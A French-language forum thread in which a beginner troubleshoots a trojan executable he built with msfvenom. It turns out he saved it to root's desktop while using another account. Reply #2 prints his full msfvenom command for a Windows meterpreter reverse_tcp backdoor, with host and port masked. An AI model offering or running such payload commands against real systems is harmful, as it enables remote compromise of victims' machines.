Auteur Sujet: Problème lors de la création de backdoor avec msfvenom  (Lu 3331 fois)

Hors ligne Papaloloo

• Membre Junior
  • *
  • +0/-0
Bonjour , après avoir créé mon backdoor je lui dit de ce créer sur mon bureau msfvenom me retourne que mon backdoor c'est bien créer  cependant quand je regarde il n'y a rien mais en tappant -ls je vois qu'il est pourtant bien présent sur mon bureau mais invisible ... En le changeant de répertoire rien n'y fais il reste invisible. J'ai essayé de le supprimer via la commande rmdir mais il me dit que le fichier n'existe pas alors que la commande ls me l'affiche bien ! Je ne comprend plus rien, si quelqun pourrait m'aider sa me serais d'une grande aide .Merci  :-\ :D

Hors ligne Sghost1405

• Contributeur de Kali-linux.fr
  • Membre sérieux
  • +27/-1
  • Je suis ce que je sais.
Re : Problème lors de la création de backdoor avec msfvenom
« Réponse #1 le: 30 mars 2016 à 22:55:57 »
Quelle commande as tu utilise pour créer ton cheval de Troie?

Quel encodeur tu as utilisé? Si tu ne spécifies pas exactement ce que tu as fait il me sera difficile de trouver la solution à ton problème.

Merci d'avance

Hors ligne Papaloloo

• Membre Junior
  • *
  • +0/-0
« Réponse #2 le: 31 mars 2016 à 21:51:57 »
Déjà merci a vous d'avoir répondu si rapidement . J'ai utilisé cette ligne de commande : msfvenom -p windows/meterpreter/reverse_tcp lhost=****  lport=**** -f exe -o /root/Bureau/backdoor.exe  . Je n'est pas utilisé d'encoder c'était mon premier backdoor j'y vais par étape je voulais déjà essayer sans encodage pour voir le principe de base .
Merci
« Modifié: 31 mars 2016 à 21:53:46 par Papaloloo »

Hors ligne WarLocG

• Membre sérieux
  • +68/-0
  • Spé Code Python Java Bash
« Réponse #3 le: 31 mars 2016 à 22:07:30 »
Je vois deux choses qui m'interpellent dans ton message:

#1  .
quand je regarde il n'y a rien mais en tappant -ls je vois qu'il est pourtant bien présent sur mon bureau mais invisible ... En le changeant de répertoire rien n'y fais il reste invisible
-> je veux des captures d'écran pour confirmer cela (pas que je te crois pas mais j'ai besoin de tirer cela au net). Montrant à la fois le fichier (présumé) sur le bureau et en ligne de commande. Je veux le résultat d'un ls -Al sur le fichier ainsi qu'un lsattr sur le fichier également. (afin de voir quels sont ses attributs à ce fichier). Sous GNU/Linux, si le nom du fichier n'est pas précédé d'un point, y a pas de raison qu'il soit invisible.

#2 . 
J'ai essayé de le supprimer via la commande rmdir mais il me dit que le fichier n'existe pas alors que la commande ls me l'affiche bien !
-> rmdir sert a supprimer un dossier, la commande que tu as besoin pour supprimer un fichier est rm.

Bien à toi
« Modifié: 31 mars 2016 à 22:11:26 par WarLocG »
A lire avant de poser vos questions : http://www.linux-france.org/article/these/smart-questions/smart-questions-fr.html
Pour les questions de base sous debian : https://debian-facile.org/index-df.php
Veuillez utiliser la fonction Rechercher avant de poster.

Hors ligne Papaloloo

• Membre Junior
  • *
  • +0/-0
« Réponse #4 le: 31 mars 2016 à 22:11:19 »
Merci de ta réponse en tapant la commande LS le fichier backdoor.exe n'est pas précéder d'un point . il apparait en vert (je ne sais pas si cela a une importance) je ferais les capture d'écran des commande que tu ma dites demain. Merci beaucoup de cette réponse très rapide . bonne soirée

Hors ligne Sghost1405

• Membre sérieux
  • +27/-1
« Réponse #5 le: 31 mars 2016 à 22:29:24 »
Il apparaît en vert car c'est un exécutable comme si c'était un python .py

Hors ligne Papaloloo

• Membre Junior
  • *
  • +0/-0
« Réponse #6 le: 31 mars 2016 à 22:31:14 »
D'accord merci de l'information je vous donne plus de renseignement avec des capture d'écran demain . Merci beaucoup

Hors ligne Sghost1405

• Membre sérieux
  • +27/-1
« Réponse #7 le: 31 mars 2016 à 23:04:40 »
Pas de problème,

Volontiers pour les captures on va essayer de régler ca des que tu les postes :)

Bonne soirée

Hors ligne Papaloloo

• Membre Junior
  • *
  • +0/-0
« Réponse #8 le: 01 avril 2016 à 14:26:28 »
Bonjour a tous , je viens de résoudre le problème qui était franchement bête... En effet le backdoor etait enregistrer sur le bureau root ! Et je n'utilisait pas le compte  root ... Une erreur de ma part . Désoler et merci beaucoup de vos réponse. :-[ :P

Hors ligne Sghost1405

• Membre sérieux
  • +27/-1
« Réponse #9 le: 01 avril 2016 à 15:27:21 »
Ah ok voilà qui me permettra de poser la question la prochaine fois que ça arrive.

Bonne suite